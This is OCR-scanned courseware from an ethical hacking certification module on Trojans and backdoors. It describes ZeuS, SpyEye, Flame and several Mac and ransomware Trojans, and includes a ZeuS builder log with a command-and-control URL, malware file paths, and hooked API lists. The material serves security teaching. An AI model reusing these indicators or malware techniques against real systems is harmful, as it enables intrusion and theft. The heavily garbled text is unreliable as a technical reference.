Modifies the local local hosts hosts file (%system (%syste m root%\system32\drivers\etc\hosts) root%\system32\drivers\etc\hosts)
9
Downloads and executes arbitrary arbitr ary programs
9
Deletes crucial registry keys, keys, rendering the computer unable to boot into Wind Wi ndow ows s &» ZeuS Control Panel Builder Config and loader building Source config file:
IBuilder Logs decoder
1
C:\Documents and Settings\Kobayash \Desktop\ \Desktop\Troyano_ZeuSV [ Browse... Browse ...
Edit config
| |
Build config
| |
|
Build loader
Output Loading config from fie fi e 'C: \Documents and Setthgs\Kobayashi\Desktop\Troyano_ZeuS\ZeuS\local\config.txt'... Loading succeeded1 Creating loader file 'C:\Documents and Settngs\Kobayashi\Desktop\Troyano ZeuS\ldr.exe'... botnet«[MAIN] timer_conf!g-3600000, 60000 timer Jogs-60000, 60000 timer_stats timer_s tats-120 -1200000, 60000 url_config-http://203.14 url_config-http://203.142.10.2/~ytxjrtrav/web/cfg.bin url_comp!p=http://what smyp.com/ smyp.com/ Buld succeeded!
*
1
FIGURE 6.33: ZeuS Screenshot
SpyEye r
SpyEye is malicious software that is used by the attacker to steal targets' money from online bank accounts. Actually, this is a botnet with a network of command-and-control servers. This automatically triggers when the target starts his or her transaction and can even block the bank's transactions.
Spy Eye O **2009 133120
^
12/79
1 Statistic
Find INF INFO
221:
Settings
1 L I «•
Get statistic Get hosts D«V for
:
*
t
CTp»Hk*m m* http//www.m!crosoft w
9009k.c 0m ) ?
Do you really really
to ban th« hotf (wwMr. (wwMr.
OK
w.d«lm(H«*nung ■com
[
Ot m o m
]
431 427 342
•X •X •X •X •X •X •X »x •X •X
FIGURE 6.34: SpyEyeScreenshot
Module 06 Page 912
Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Trojans and Backdoors
Exam 312-50 Certified Ethical Hacker
D estruc tive Trojans: M4sT3r Trojan destructive ty pe of Trojan Trojan
This Trojan Trojan formats all local and network drives drives
When executed, this Trojan destroys destroys the operating system
The user will not be able to boot the Operating System
M4sT3r is a dangerous and
C EH
Format USB Drive, network network Driv e ....
Format C:\ C:\ E:\ F: \
....
Copyright © by EG-G(Uncil. All Rights Reserved. Reproduction Is Strictly Prohibited
r
D e s tr t r u c ti ti v e T r o ja ja n s: s : M 4 s T3 T 3 r T r o ja ja n
The M4sT3r Trojan is exclusively designed to destroy or delete files from the victim's computer. Files are automatically deleted by the Trojans, which can be controlled by the attacker or can be preprogrammed like a logic bomb to perform a particular task on a given time and date. When executed, this Trojan destroys the operating system. The victim cannot boot the operating system. This Trojan formats all local and network drives.
Format USB Drive, network Drive
.....
Format C:\ E:\ F :\
.....
M4sT3r Trojan
FIGURE 6.35: Attacker using M4sT3r Trojan for deleting or destroying files
Module 06 Page 913
Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Trojans and Backdoors
Exam 312-50 Certified Ethical Hacker
N otificatio otific atiorr Troj ans an s ■ Notification Trojan Trojan sends sends the location location of the victim's IP address to the attacker B
Whe neve r the victim's victim's computer computer connect connects s to the Internet, Internet, the attacker attacker receives receives the notification
Notification Types ■>
SIN Notification
Directly notifies the attacker's server
■>
ICQ No Notification
Notifies the attacker using ICQ channels
»
PHP Notification
Sends the data by connecting to PHP server on the attacker's server
■>
E-Ma E-Mail il Noti Notifi fica cati tion on
Sends the notification through email
Victim
}■
>
Net Send
Notification is sent through net send command
Infected with Trojan
j.
.»
CGI Notification
Sends the data by connecting to PHP server on the attacker's server
•>
IRC IRC notifi notificat cation ion
Notifie Notifies s the the atta attacker cker usin using g IRC IRC chan channe nels ls
Copyright © by EG-Gouncil. All Rights jie$erv6
N o t i f i c a t i o n T r o j a n s Notification Trojans send the IP address of the victim's computer to the attacker. Whenever the victim operates the system, the notification Trojan notifies the attacker. Some of the notifications include: © SIN Notification: Directly notifies the attacker's server 0 ICQ Notification: Notificati on: Notifies the attacker using using ICQ channels 0 PHP Notification: Sends the data by connecting to PHP server serve r on the attacker's server 0
Email Notification: Sends the notification through email
0 Net Send: Notificati on is sent through net send command © CGI CGI Notification: Notifi cation: Sends the data data by connecting connectin g to PHP serveron serveron the attacker's server © IRC notifica noti fication: tion: Notifies Noti fies the attacker attac ker using using IRC channels chann els
Module 06 Page 914
Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Trojans and Backdoors
Exam 312-50 Certified Ethical Hacker
C red re d it Card Car d Troj Troj a n s
CEH UrtifW
Credit card Trojans steal victims' credit card relate rel ated d data such as card no., no., CVV2, and billing details
Attacker A
itkMl lUckw
:
Credit card Trojans trick users to visit fake ebanking websites and enter personal
w
information
<
Victim A
Trojan servers transmit the stolen data to remote hackers using email, FTP, IRC, or other
VISA
methods
Copyright © by EG-G*ancil. All Rights Reserved. Reproduction is Strictly Prohibited
C r e d it it C a r d T r o j a n s Credit card Trojans, once they are installed on the victim's system, collect various details such as credit card numbers, latest billing details, etc. Then, a fake online banking registration form is created and they make the credit card user believe that it is genuine information from the bank bank.. Once the user enters the required information, attackers collect the information and use the credit card for personal use without the knowledge of the victim. Credit card Trojans steal victims' credit-card-related data such as card number, CVV2s, and billing details. These Trojans trick users into visit fake e-banking websites and entering personal information. The Trojan servers transmit the stolen data to remote hackers using email, FTP, IRC, or other methods.
Module 06 Page 915
Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Trojans and Backdoors
Exam 312-50 Certified Ethical Hacker
FIGURE 6.36: Attacker stealing credit card information of victim's using credit card Trojan
Module 06 Page 916
Ethical Hacking and Counte rmeasu res Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Trojans and Backdoors
Exam 312-50 Certified Ethical Hacker
D ata Hiding Trojan s (Enc rypted Trojans) Encryption Trojan encrypts
Attackers demand a ransom
data files in victim's system and renders information
or force victims to make purchases from their
unusable
online drug stores in return
"Your computer computer caught our
for the password to unlock files
software while browsing browsing 'Do not not try to search
illegalp o m pages, pages, all your your
for a progr program am that
docu docume ment nts, s, textfiles, databas databases es in the folder
k
/
M y Documen Documents ts was wa s encrypted with complex password."
Confidential Documents
Company Database C♦♦source ♦so urce code Personal Information
Financial Information Important Files & Folders F
(S - -
w
encrypted your
™ >information - it ' simply does not exists inyou our hard disk anymore," pay pa y us the money to
unlock the passwor password d
Copyright © by EC-CMICil. All RightsJte$erv fei;Rep roductio n is Stric tly Prohibited.
D ata H iding iding Trojans (Encryp ted Trojans) Troj ans) Encryption Trojans encrypt the data present on the victim's computer and renders the complete data unusable: "Your computer caught our software while browsing illegal porn pages, all your documents, text files, databases in the folder My Documents was encrypted with complex password." Attackers demand a ransom or force victims to make purchases from their online drugstores in return for the password to unlock files: "Do not try to search for a program that encrypted your information - it simply does not exists in your hard disk anymore," pay us the money to unlock the password." This can be decrypted only by the attacker, who demands money, or they can force the user buy from a few websites for decryption.
Module 06 Page 917
Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Trojans and Backdoors
Exam 312-50 Certified Ethical Hacker
OS X Trojan Trojan:: C r is isis is B
CEH
OSX.Crisis is a Trojan horse horse that steals steals potentially confidential informatio n and opens a back door on the compromised computer When the Trojan is executed, executed, it creates the following directories and files: /System/Libra /System/Library/Frameworks/Foundation.framework/XPCServices/com.apple.mdworker_server. xpc/Contents/MacOS/com.apple,mdw orker_server /System/Libra /System/Library/Frameworks/Foundation.framew ry/Frameworks/Foundation.framework/XPCServices/com.apple.nndworker_server.xpc/Conten ork/XPCServices/com.apple.nndworker_server.xpc/Contents/Resources/ ts/Resources/ $HOME/Library/LaunchAgents/com.apple.mdworker.plist $HOME/Library/Preferences/jl3V7we.app $HOME/Library/ScriptingAdditions/appleHID/Contents/lnfo.plist $HOME/library/ScriptingAdditions/appleHID/Contents/MacOS/IUnsA3Ci.Bz7 SHOME/Library/ScriptingAdditions/appleHID/Contents/Resources/appleOsax.r
Crisis Crisis may perform the following actions:
1--------------------------- V Monito r Skype Audio traffic
Record conversations in MS Messenger and Adium
Monit or Safari or Firefox Firefox to record websites and capture screenshots
Send files to the command and control server
_
J i
Copyright © by EG-G*ancil. All Rights Reserved. Reproduction is Strictly Prohibited.
■
mi
OS X Tro jan: C risis
OSX.Crisis is a Trojan horse that steals potentially sensitive information that is on the victim's system and opens a back door on the compromised computer (victim's system) for future attacks. When the Trojan is executed, it creates the following directories and files:
/ Syst em/ Li br ar y/ Fr amewor ks/ Found Foundat at i on. on. f r amewor k/ XPCS PCServi er vi ces/ com. app appl e. mdwor ke r _ ser ver .xpc/ Cont ont ent ent s/ MacOS/ com. app appl e. mdwor ker _s er ver / Syst em/ Li br ar y/ Fr amewor ks/ Found Foundat at i on. on. f r amewor k/ XPCS PCServi er vi ces/ com. app appl e. mdwor ke r _s er ver ver .xpc/ .xpc/ Cont ent s/ Resour sour ces/ ces/ $HOME/ Li br ar y/ Laun LaunchA chAgent ent s/ com. app appl e. mdworke or kerr . pl i st $HOME/ Li br ar y/ Pr ef er ences/ ences/ j 13V7we.ap e.app $HOME/ Li br ar y/ Scr i pt i ngAddi t i ons/ appl eHI D/ Cont ent s/ I nf o. pl i st $HOME/ Li br ar y/ Scr i pt i ngAddi t i ons/ app appl eHI D/ Cont ent s/ MacOS/ l UnsA3 sA3Ci .Bz7 .Bz7 $HOME/ Li br ar y/ Scr i pt i ngAddi t i ons/ appl eHI D/ Cont ent s/ Resour sour ces/ ces/ appl eOsax. sax. r The following are the actions performed by the OSX.Crisis: 9
Monito r Skype audio traffic
Q
Monito Mon itorr Safari or Firefox to record websites and and capture screenshots
0
Record conversations conver sations in in MS Messenger Messenge r and Adium
9
Send files to the command and control server
Module 06 Page 918
Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Trojans and Backdoors
Exam 312-50 Certified Ethical Hacker
MAC OS OS X T rojan: rojan : DN SC han hanger ger
c EH (•rtifwtf
ithnai Nm Im
jan uses uses social social engineering engineering techniques to make make user users s download download the the progra program m and and run run maliciou malicious s code code
The malware modifies the DNS settings of the active network. The users are forced to download codecs or other movie downloads through QuickTime, etc. Once the download is finished, then the Trojan is attacked, resulting in slow access to the Internet, unnecessary ads popping up on the screen of the computer, etc. This Trojan uses social engineering techniques to make users download the program and run malicious code.
FIGURE 6.37: Attacker injecting MAC OS X Trojan in victim's system through downloads and prompt
Module 06 Page 919
Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Trojans and Backdoors
Exam 312-50 Certified Ethical Hacker
MAC OS XTrojan: DNSChanger (C o n t’d )
Q £H UrtifM ifM| IthKJi lU ckM
MAC OS OS X Trojan : D N SC hang er (C ont’ ont’d d) After the user downloads the false codec, the process of tricking and retrieving the user's information continues as follows: 0
DNS settings: Local machine's DNS settings are changed to attacker's IP address
0
Afte r the fake codec is installed, a video is played so as not not to raise Playing a video: After suspicions
9
HTTP message: A notification is sent to the attacker about the victim's machine using an
HTTP post message 9
Hackers take complete control of the victim's MAC OS X computer Complete control: Hackers
Module 06 Page 920
Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Trojans and Backdoors
Exam 312-50 Certified Ethical Hacker
M ac OS X Trojan: Hell R aiser
C EH (■WM
I
■
HMu Mul Had■•
Hell Raiser allows an attacker to gain access access to the victim system and send send pictures, pictures, pop up chat messages, messages, transfer files files to and from the victims system, completely mon itor the victims operations, etc.
Chat interface U6CT nAXQftO «
DC
DC
Victor's parameters parameters ;17*S
(________ OSCONNtCT________
* 1HI to■ ►•*•dlXh •finng< 1(1to• p«n«m n 0 0 1 •»»!•
— 5.it
.
...
----•jt
----
Note: The complete coverage of MAC OS X hacking is presented in a separate module Copyright 0 by IG Council. All Rights Reserved. Reserved. Reproduction is Strictly Prohibited
M ac OS X Trojan: Hell R aise r Hell Raiser is malware that gets onto the victim's system when clicked on, the user it is an innocent file. Once access has been gained to the victim's system, the attacker can send pictures, pop-up chat messages, can transfer files to and from the victim's computer, and even can turn ON and turn OFF the system from a remote location. Finally, victim operations can be completely monitored.
Modu le 06 Page 921
Ethical Hacking and Counte rmeasu res Copyright © by EC-C0l1nCil All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Trojans and Backdoors
Exam 312-50 Certified Ethical Hacker
Troj a n A n aly sis: F lam e
CEH
Flame, also known as Flamer, sKyWlper, or Skywiper, is modular computer malware discovered in 2012 that attacks computers running the Microsoft Windows operating system The malware is used for targeted cyber espionage in Middle Eastern countries Flame can spread to other systems over a local network (LAN) or via USB stick It can record audio, screenshots, keyboard activity, and network traffic The program also records Skype conversations and can turn infected computers into Bluetooth beacons which attempt to download contact information from nearby Bluetooth-enabled devices
Copyright O by E6-6« ncil . Ail Rights Reserved. Reproduction is Strictly Prohibited.
& gN
O
> Tro jan A nalysis: nalysis: Flam e Source: http://www.kasperskv.com
Flame, also known as Flamer, sKyWlper or Skywiper, is modular computer malware that attacks computers running the Microsoft Windows operating system. This malware is used for targeted cyber espionage. It can spread to other systems over a local network (LAN) or via USB stick. It can record audio, screenshots, keyboard activity, and network traffic. It also records Skype conversations and can turn infected computers into Bluetooth beacons that attempt to download contact information from nearby Bluetooth-enabled devices. The following diagram depicts how an attacker succeeds in installing Flame on a victim's system.
Sends data to attacker
«»
Attacker
o ©
©
Sets command and control center
Redirects to malicious server .................
J © Malware Server
©
* ••
©
Downloads a malware
Provides a i nstruction to get data
@>
Command and Control Center
f) U
M
■ m
3
©
Infects other hardware in LAN.
Infected Hardware in LAN
In order to inject a Trojan onto the victim's system and to gain sensitive information, attackers first set a command and control center and a malware server. Next, the attacker sends a
Module 06 Page 922
Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Trojans and Backdoors
Exam 312-50 Certified Ethical Hacker
phishing email to the victim's system and lures him or her to open the link. Once the attacker opens the link, he or she is redirected to the malicious server. As a result, the malware gets downloaded onto the victim's system and the system is infected. This infected machine infects the other hardware connected on the LAN. Thus, the commands from the control and command center are sent to and received from the infected hardware LAN. According to the received commands, the infected hardware LANs send the data to the control and command center.
Module 06 Page 923
Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Trojans and Backdoors
Exam 312-50 Certified Ethical Hacker
Troj a n A n aly sis: F lam e
c gh
(C on t ’d)
The Flame C&C infrastructure, which had been operating operating for years, w ent offline immediately after Kaspersky Lab disclosed the discovery of the malware's existence last week
Currently there are more than 80 known domains used by Flame for C&C servers and its related domains, which have been registered between 2008 and 2012
During the past 4 years, servers hosting the Flame C&C infrastructure infrastructure moved between multiple locations, including Hong Kong, Turkey, Turkey, Germany, Poland, Malaysia, Latvia, the United Kingdom, and Switzerland
The Flame C&C domains were registered with a list of fake ident ities and with a vari ety of registrars, registrars, going back as far as 2008
*- —
According to Kaspersky Lab's sinkhole, infected users were registered in multiple regions including the Middle East, Europe, North America, and Asia-Pacific
0
B B
The Flame attackers seem to have a high interest in PDF, Office, and AutoCad drawings
The data uploaded to the Flame C&C is encrypted using relatively simple algorithms; stolen documents are compressed using open source Zlib and modified PPDM compression
Windo ws 7 64 64 bit, which we previously recommended as a good solution against infections infections with other malware, seems to be effective against Flame
htp://www.kaipersky.com Copyright O by E6-6« ncil . Ail Rights Reserved. Reproduction is Strictly Prohibited.
Tro jan A nalysis: nalysis: Flam e (C ont’ ont’d) d) Source: http://www.kasperskv.com Kaspersky Lab summarizes the results of the analysis about Flame as follows: 9
The Flame C&C infrastructure, which had been operating for years, went offline immediately after Kaspersky Lab disclosed the discovery of the malware's existence recently.
9
Currently Curre ntly there are more than 80 known domains used used by Flame for C&C servers and its its related domains, which have been registered between 2008 and 2012.
9
During the past four years, servers hosting the Flame C&C infrastructure infrast ructure moved between betwe en multiple locations, including Hong Kong, Turkey, Germany, Poland, Malaysia, Latvia, the United Kingdom, and Switzerland.
9
The Flame C&C domains were registered with an impressive list of fake identities and with a variety of registrars, going back as far as 2008.
9
According to Kaspersky Lab's sinkhole, infected users were registered in multiple regions including the Middle East, Europe, North America, and Asia-Pacific.
9
The Flame attackers seem to have a high interest in PDFs, Office, and AutoCad drawings.
9
The data uploaded to the Flame C&C is encrypted using relatively simple algorithms. Stolen documents are compressed using open source Zlib and modified PPDM compression.
Module 06 Page 924
Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved, Reproduction is Strictly Prohibited.
Ethical Hacking and Counterm easures Trojans and Backdoors
Exam 312-5 312-50 0 Certified Ethical Hacker
Windows 7 64 bit, which we previously recommended as a good solution against infections with other malware, seems to be effective against Flame.
Module 06 Page 925
Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Trojans and Backdoors
Exam 312-50 Certified Ethical Hacker
F l a m e C & C S e r v e r A n a l y s is is
CEH
(«rt 1fw4
It kNjI lUilwt
Flame's C&C Server was running on 64-bit Debian 6.0.x OS under OpenVZ and using PHP, Python, and bash programming languages with MySQ L database on Apache 2.x 2.x web server
JW«PP«
*!..■► •*.
with self-signed certificates It was accessible over the HTTPS protocol, ports 443 and 8080 The document root directory was /var/www/htdocs/, which has sub-directories joaa joaa'itl 'itl 'jgff»»PTOt Maa4e»X
and PHP scripts An infected machine was controlled using a message-exchange mechanism based on data
Contents of the /var/www/htdocs/ne wsforyou/ directory Control !*unci
containers files
l » •
* :V
•' •
UaM »*-
Donmlonil da l j
Control panel interface http://w w w.kasper sky.com
Copyright © by EG-G*ancil. All Rights Reserved. Reproduction is Strictly Prohibited
S p Flam e C&C C &C Server A nalysi nalys i s Source: http://www.kaspersky.com Flame's C&C Server was running on 64-bit Debian 6.0.x OS under OpenVZ and using PHP, Python, and bash programming languages with MySQL database on Apache 2.x web server with self-signed certificates. This server configuration was a typical LAMP (Linux, Apache, MySQL, PHP) setup. It was used to host a web-based control panel as well as to run some scheduled fully automated scripts in the background. It was accessible over the HTTPS protocol, ports 443 and 8080. The document root directory was /var/www/htdocs/, which has sub-directories and PHP scripts. While the systems had PHP5 installed, the code was made to run on PHP4 as well. For example, /var/www/htdocs/newsforyou/Utils.php has the "str_split" function defined that implements the "str_split" function logics from PHP5, which was not available in PHP4. The developers of the C&C code most likely implemented compatibility with PHP4 because they were not sure which one of two major PHP versions would be installed on the C&Cs.
Module 06 Page 926
Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Trojans and Backdoors
Module 06 Page 927
Exam 312-50 Certified Ethical Hacker
Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Trojans and Backdoors
Exam 312-50 Certified Ethical Hacker
F l a m e C & C S e r v e r A n a ly l y s is is
r
(Cont’d)
u
Certified ified | ttfcxjl »U*b« »U*b«
0 C&C can understand several communication protocols including OldProtocol, OldProtoco lE, SignupProto col, and Red Protocol to talk to different different clients clients codenamed SP, SPE, FL, and IP
C O M M A N D A N D C O N TR TR O L S E R V E R FL (Flame) PROTOCOLS
t>
L
OldPRotocol
•->
OldProtocollE
RedProtocol Not yetimplem lemented ted
CLIENTS
1
HTTP, HTTPS
i :
i
■f> SignupProtocol
____ is__ ____ ____ ____ __
Clients and Protocols relations found in this Flame C&C
http://w w w .kospersky .com
Copyright © by EG-C(ancil. All Rights Reserved. Reproduction is Strictly Prohibited.
Flam e C&C C&C S erver A nalysis (Cont’d (Cont’d) Source: http://www.kaspersky.com C&C can understand several communication protocols including OldProtocol, OldProtocolE, SignupProtocol, and RedProtocol to talk to different clients codenamed SP, SPE, FL, and IP. A typical client session handled by the C&C started from recognition of the protocol version, then logging of connection information, followed by decoding client request and saving it to the local file storage in encrypted form. All metadata about files received from the client was kept in a MySQL database. The C&C script encrypts all files received from the client. The C&C uses a PGPlike mechanism to encrypt files. First, the file data is encrypted using the Blowfish algorithm in CBC mode (with static IV). The Blowfish key is generated randomly for each file. After file encryption, the Blowfish key is encrypted with a public key using asymmetric encryption algorithm from the openssl_public_encrypt PHP function.
Module 06 Page 928
Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Trojans and Backdoors
Exam 312-50 Certified Ethical Hacker
COMMAND COMMA ND AND CONTRO CONTROL L SERVER FL (Flame) PROTOCOLS OldPRotocol
SP CLIENTS
— RedProtocol Not yet implemented
|
SPE
IP
G I
■>
OldProtocollE OldProt ocollE
Internet: HTTP, HTTPS
■>• SignupProtocol
FIGURE 6.39: Clients and protocol relations found in this Flame C&C
Module 06 Page 929
Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Trojans and Backdoors
Exam 312-50 Certified Ethical Hacker
Trojan A n alys al ysis is:: SpyEye J
CEH
The Trojan mak es use of use r m ode roo tkit te ch niq ue s to hide both its re gis try key located \ns\deHKEY_CURRENT_USER\SOFTWARE\Microsoft\ Windows\Current configuration on Version\Run and the folder containing the Trojan executable and the configurati file config.bin
J
The fol de r is u sual ly loca ted in th e roo t dir ec to ry of t he dr ive wh er e t he ope rati ng system is located
SpyEye is able to inject code in running processes and can perform the following
iri •A C YWflHXAV e4|* bl)|WlNINt I CVw»CKM5\5»xccr0:^#l0Cw0!458|\s lNINET dlH11PS0nJl.dllN >Jl. dllNlQuw|On lQuw|On*ctcn *ctcnFU FU C\^»JW^5 \wt«22«^nk>ooaoxc(&<0ir*dl.dllN(Ro0ir«Tlro:d C \W*MXM\^l« *G\*nbpm.x (UO] (U O] rMI r MI p1rncli.(< C V1 n00w s\^<1»n32l», nlooor1axc(&40] CPrPT CPr PT 32.dl'FF>:lnpor1C F> :lnpor1C©11$tCfe C\^INOOw/S\1yatefnX^nb C\^INOOw/S\1y atefnX^nboor\exfl oor\exfl &*Clj USER32 dl 11aruto!eMe*M0; C VW*C»ON'/S\jv*1»r..S2V^r1lt»yc»rw#x*{&*0)WS2_32dl ivr d CV.vlfJOOWSNMWttiS^nbooaaxeiE^Ojv/ININEr.dlllrttoiiwtQuooOoiiwtf -V/!ylHOCN -V/!yl HOCNVj\ty5lB1n^V»nbgQrvexe{fciOJWINIME Tdi ll litf-fJprt1f l1*|1*?1W CVWt®Ow S\^t S\^ter erH H 2^ nbgor^x»{&*01WINIMEr.dllHK1/vjtPtq^«HB. C V/»» OWS\»y«le1»32\>»nbo0f\exc(6
functions: © Capture network traffic t> Send and receive network packets in in order order to bypass application firewalls e Hide and and prevent access to the startup registry entry e Hide and and prevent access to the binary code
//H/ l'iA Ud/ n *POBAEBXB EBXB 772118D68Bv<09J M& 06/£E29t
7C90D9TC0 Byte* WPO&tDKSB
7C30C-F9E8B*■*. JMP0 &E2D C2
7C90E4$c9 B*ec
»'P:BAP50^
?D30E 5D9 B Bytoi jMP 0B*O7: CS 7C30E9758 JkFC8«2E78
WJMPC PCBA0n3JI 7&3)2?7 8ByWJ
77DnfEB0n>r, JMTT^&r^n 77AEF74B8 S/ « J KF: BW E8 > 77D48f:ll 0f:y*-. JMPQBA0930: 7lAB42a&8B,«.v .KP<»*£AS5 77IB81A788*et J»«F C8*E?8«D 771C4ACSBB>*e1 MP0B4£/Asa 771C54CA8B,t»r .HP<*Oi>S33 771C61DC8Byle1 JMP0F /C9415 771C?68B5 0/h [EB. 01.C\ 01.C\ E5 E5 7 77IC768E2B *et )•1.941&XH G E _
API functions hooked by the Trojan within the winlogon.exe virtual address space
© Hide the own process on injected processes e Steal information information from Internet Explorer Explorer and Mozilla Firefox
http://techblog.avira.com Copyright © by EG-C(ancil. All Rights Reserved. Reproduction Is Strictly Prohibited.
A
T ro r o ja ja n A n al a l y si sis : S p y E y e Source: http://techblog.avira.com
The Trojan makes use of user mode rootkit techniques to hide both its registry key located inside HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\Current Version\Run and the folder containing the Trojan executable and the configuration file config.bin. The folder is usually located in the root directory of the drive where the operating system is located. SpyEye is able to inject code in running processes and can perform the following functions: 9
Capture network traffic
0
Send and and receive network netwo rk packets in order to bypass application applicat ion firewalls firewa lls
Q
Hide and prevent prev ent access access to the startup registry entry
Q
Hide and prevent prev ent access access to the binary code
9
Hide the own process process on injected processes
e
Steal information from Internet Inte rnet Explorer and Mozilla Firefox
Module 06 Page 930
Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Trojans and Backdoors
Exam 312-50 Certified Ethical Hacker
The following API functions are hooked by the Trojan within the winlogon.exe virtual address space: text text text text text text text .text text text text text .text text text text text text
C:\WINDOWS\System32Salgexel4681WININETdllMnternetReadFileExA C:\WINDOWS\Sys tem32\alg exe[468] WININET dlllHttpSendReq dlllHttpSendRequestW uestW C: \WI N D 0 WS \sys tem32\winlogon. exe[840) ntdll dll! N tE numerateV numerateV alueKey alueKey C: \WI N D 0 WS \sys tem32\winlogon. exe[640j ntdll. dll! dll! N IQuetyD irectotyFile irectotyFile C:\W I N D 0W S\system32\w1nlogon exe[640j ntdll dll! N tR esumeT esumeT hread hread C: \WI N D 0 WS \sys tem32\winlogon. exe[640j ntdll dll! N tS etl etl nformationFile nformationFile C AWIN D 0 WS \s ystem32\winlogon. exe[640] ntdll. dll! dll! N tVdmContro tVdmControll C: \WI N D 0 WS \sys tem32\winlogon. exe[640j kernel32. dll! dll! Flushl Flushl nstructionCache C:\W I N D 0 WS \sys tem32\winlogon. exe[640] A DVA R 32. dll! CtyptE CtyptE ncrypt C:\W I N D0 WS \sy stem3 2\winl ogon. ex e[840] CRYPT 32. dll! dll! PFXI PFXI mportCertS mportCertS tore C:\W I N D0 WS \sys tem32\ winlo gon. exe[ 640] US ER 32. 32. dll!T ranslateM ranslateM essage C:\W I N D 0 WS \sys tem32\winlogon. exe[640] W S2_32. dll! send send C: \WI N D 0 WS \sys tem32\winlogon. exe[640] Wl NIN E T. dll! dll! I nternetQ nternetQ uetyO uetyO ptiorA C:\WIND0WS\system32\winlogon. exe[840] WININET dll! H ttpO penR equestA C:\WIND0WS\system32\winlogon. exe[840] WININET dll! H ttpAddR equestH e. .. C:\W I N D 0 WS \sys tem32\winlogon. exe[640] W l NIN E T dll! I nternetCloseH andle C:\W I N D0 WS\sy stem32\winlo gon exe[640) Wl NIN ET dll! HttpS endR equestA C:\WIND0WS\system32\winlogon. exe[640] WININET dll! HttpSendR equestA .
771F7E9A 8 Bytes Bytes JMP 0BAEB2E6 77211808 8 Bytes JMP 0BAEE296 7C90D97G 8 Bytes J MP 0BAD769B 7C90DF5E 7C90DF5E 8 Bytes JMP 0BAE2DC2 7C90E45F 8 Bytes J MP 0BAF1507 7C90E5D9 8 Bytes Bytes JMP 0BAD73E5 7C90E975 8 Bytes Bytes JMP 0BAE2E78 7C839277 8 Bytes JMP 0BAD7831 77DF15 58 8 Bytes J MP 0BAEA0E1 77AEF748 8 Bytes JM P 0BADE8QA 77D48BCE 8 Bytes JMP 0BAD930C 71AB428A 8 Bytes JMP 0BAEA9B5 771B81A7 8 Bytes JMP 0BAE7B9D 771C4AC5 8 Bytes JMP 0BAE7A88 771C54CA 8 Bytes JMP 0BADA638 771 CGI CGI DC 8 Bytes JM P0B AE8 415 771C76B8 5 Bytes [EB. 01, C3. E9. 7. 771C76BE 771C76BE 2 Bytes Bytes [92, 94] {XCHG E
FIGURE 6.40: 6.40: API functions hooked by the Trojan within the winlogon.exe virtual address space
Module 06 Page 931
Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Trojans and Backdoors
Exam 312-50 Certified Ethical Hacker
Trojan Trojan A nalys na lysis: is: SpyEye
CEH
(Cont’d)
After execution the Trojan connects to a pu s h push push pu s h pu s h le a pu s h push push call leaue retn
server and sends sends some information abo ut the system to the server like: © MD5 of the executed sample 6 Operating system version © Computer Co mputer name 9 Internet Explorer Explorer version version 8 Username © Version number of the malware
□ □ □ ^
sv svchost exe svchoste svchostexe xe svchost exe System stem System Z ] Syste System ^ System stem System ^ wn wniogon exe
1096 1272 1052 4 4 4 4 4 660
UDP UDP UDP TCP TCP TCP UDP UDP UDP TCP
eax i*i*6547i*Bh 4969h 3367h 5 047h e c x , [ e b p - 1C 1C h ] e cx d u o r d p t r [ebp-OCh] duord ptr [ebp-10h] sub 42F851
Malware is packed with UPX and a polymorphic decryptor
00e5f6a15 00e5f6e15 00e5t8a15 00e5f$al5 00e5#6a15 00e5#6a15 00e5f6a15 00e5t6a15 00e5t6a15
1034 1900 1032 nettxos-ssn rwcfosoftck netb»os-«$ netb*os-dgm rmcjosottds 1083
■ 00e5f$a15 00e5f6a15 ■
0 0 ■
■ reve*se-mtl-76-76-98-82gogax 8-82gogax com
■ https https
USTENING USTENING
sy n . s e n t
Malware injected piece of code within winlogon.exe virtual address space
http://techblog.avira.com ----------
Copyright © by
EG-G*ancil. All Rights Reserved. Reproduction is Strictly Prohibited.
